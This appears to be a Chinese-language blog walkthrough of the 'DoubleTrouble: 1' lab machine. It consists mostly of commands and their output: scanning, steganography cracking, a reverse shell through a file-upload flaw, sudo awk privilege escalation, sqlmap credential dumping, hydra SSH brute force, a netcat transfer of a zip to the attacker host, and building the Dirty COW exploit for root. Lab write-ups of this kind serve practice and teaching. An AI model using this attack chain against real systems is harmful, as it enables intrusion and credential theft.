nmap -sP 10.80.56.0/24
主机:10.80.56.101
靶机:10.80.56.178
nmap -p- 10.80.56.178
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
nmap -A -n 22 10.80.56.178
nmap -A -n 80 10.80.56.178
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 6a:fe:d6:17:23:cb:90:79:2b:b1:2d:37:53:97:46:58 (RSA)
| 256 5b:c4:68:d1:89:59:d7:48:b0:96:f3:11:87:1c:08:ac (ECDSA)
|_ 256 61:39:66:88:1d:8f:f1:d0:40:61:1e:99:c5:1a:1f:f4 (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: qdPM | Login
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
dirsearch -u http://10.80.56.178/
[20:26:21] 200 - 406B - /backups/
[20:26:23] 200 - 0B - /check.php
[20:26:30] 200 - 647B - /images/
[20:26:30] 200 - 2KB - /index.php
[20:26:30] 200 - 2KB - /index.php/login/
[20:26:31] 200 - 762B - /install/index.php?upgrade/
[20:26:31] 200 - 762B - /install/
[20:26:31] 200 - 606B - /js/
[20:26:41] 200 - 338B - /
[20:26:42] 200 - 26B - /robots.txt
[20:26:42] 200 - 461B - /secret/
[20:26:48] 200 - 476B - /uploads/
#获得关键信息
wget http://10.80.56.178/secret/doubletrouble.jpg
#尝试漏洞搜索,发现有文件上传漏洞,不过需要登录到后台
searchsploit qdPM 9.1
#破解关键信息,尝试steghide读取,发现有密码
steghide extract -sf doubletrouble.jpg
#使用stegseek爆破,爆破成功
stegseek doubletrouble.jpg
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek
[i] Found passphrase: "92camaro"
[i] Original filename: "creds.txt".
[i] Extracting to "doubletrouble.jpg.out".
#提取隐写内容,是账号和密码
cat creds.txt
otisrush@localhost.com
otis666
#漏洞内容是账户上传头像处,可以上传木马,有报错,但还是能上传。
#文档说的是官方正则写错了,能拦截,但是报错不拦了
#上传php反弹shell脚本,开启交互式木马
python -c "import pty;pty.spawn('/bin/bash')"
#收集信息
cat .htaccess
Order Deny,Allow
Deny from all
#尝试提权,发现awk是root权限
sudo -l
Matching Defaults entries for www-data on doubletrouble:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User www-data may run the following commands on doubletrouble:
(ALL : ALL) NOPASSWD: /usr/bin/awk
#执行提权命令,提权成功
sudo awk 'BEGIN {system("/bin/sh")}'
#发现根目录存在另一个镜像,果然是双重麻烦
doubletrouble.ova
python3 -m http.server 8080
wget http://10.80.56.178:8080/doubletrouble.ova
#开启下一个麻烦
nmap -sP 10.80.56.0/24
主机:10.80.56.101
靶机:10.80.56.178
nmap -p- 10.80.56.178
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
nmap -A -n 22 10.80.56.178
nmap -A -n 80 10.80.56.178
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.0p1 Debian 4+deb7u4 (protocol 2.0)
| ssh-hostkey:
| 1024 e8:4f:84:fc:7a:20:37:8b:2b:f3:14:a9:54:9e:b7:0f (DSA)
| 2048 0c:10:50:f5:a2:d8:74:f1:94:c5:60:d7:1a:78:a4:e6 (RSA)
|_ 256 05:03:95:76:0c:7f:ac:db:b2:99:13:7e:9c:26:ca:d1 (ECDSA)
80/tcp open http Apache httpd 2.2.22 ((Debian))
|_http-server-header: Apache/2.2.22 (Debian)
|_http-title: Site doesn't have a title (text/html).
#进入主页,发现是登录页面,没有回显,可能是sql注入,sqlmap尝试发现是延时注入
sqlmap -u http://10.80.56.178/index.php --data="uname=admin&psw=12345" -D doubletrouble -T users -C username,password --dump
available databases [2]:
[*] doubletrouble
[*] information_schema
Database: doubletrouble
[1 table]
+-------+
| users |
+-------+
Database: doubletrouble
Table: users
[2 columns]
+----------+--------------+
| Column | Type |
+----------+--------------+
| password | varchar(255) |
| username | varchar(255) |
+----------+--------------+
Database: doubletrouble
Table: users
[2 entries]
+----------+----------+
| username | password |
+----------+----------+
| montreux | GfsZxc1 |
| clapton | ZubZub99 |
+----------+----------+
#数据库获取用户和密码,尝试九头蛇爆破
hydra -L user.txt -P pass.txt 10.80.56.178 ssh
[22][ssh] host: 10.80.56.178 login: clapton password: ZubZub99
#获得第一个flag
cat user.txt
6CEA7A737C7C651F6DA7669109B5FB52clapton@doubletrouble
cat authorized_keys
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDNLhnhzhOvRSRJ2fzkWgNfJ0gxrQvFupKVcS8SDAf8GFjsNd9Gy5FgcWSt7s54j+EumUfHVNwupZuMsRYphg/zpTBwUQ4vgBGPbLUqw64tW2OucbidJ5m6QoS0UkMkjmSBKuOAy0c/BdMSLi0f6aYnlH/H9FL0JYk4jLHVawA+h1RfjlDiRBteSDKh7Mqv1RMnRHZE0bzGEMVSTkNEyeMqZbrqguuvBk2RzMHUqzVLVgw91TVPnDRqd02tI/YjECkyp/igp+4ozqPQQ361biMYF62ft7eIN2uHWzXVcb9GvezXIOzXcYmOQ+H88KUqezVMPvHDAzGRWf0pKOAccukH clapton@doubletrouble
#发现神秘zip,解压发现里面存在有密码的zip
nc 10.80.56.101 1234 < get.zip
#爆破成功
zip2john get.zip | tee hash
john hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
myspace4 (spammer.zip/creds.txt)
#获得一窜字符串,以为是另一个用户密码,但是失败了
mayer:lionheart
#查看linux版本
uname -a
Linux doubletrouble 3.2.0-4-amd64 #1 SMP Debian 3.2.78-1 x86_64 GNU/Linux
#查询发现linux内核3.2.0,存在脏牛漏洞,https://github.com/firefart/dirtycow/blob/master/dirty.c
gcc dirty.c -o dirty
#发现缺少crypt,以及pthread
/tmp/ccztF1Hz.o: In function `generate_password_hash':
exp.c:(.text+0x1e): undefined reference to `crypt'
/tmp/ccztF1Hz.o: In function `main':
exp.c:(.text+0x4cd): undefined reference to `pthread_create'
exp.c:(.text+0x501): undefined reference to `pthread_join'
collect2: error: ld returned 1 exit status
#查询添加-l链接crypt,以及pthread
gcc -pthread dirty.c -o dirty -lcrypt
#执行根据提示,切换firefart用户,获得root权限
cat root.txt
1B8EEA89EA92CECB931E3CC25AA8DE21firefart@doubletrouble:
DOUBLETROUBLE: 1靶机渗透记录
最新推荐文章于 2024-10-01 05:04:32 发布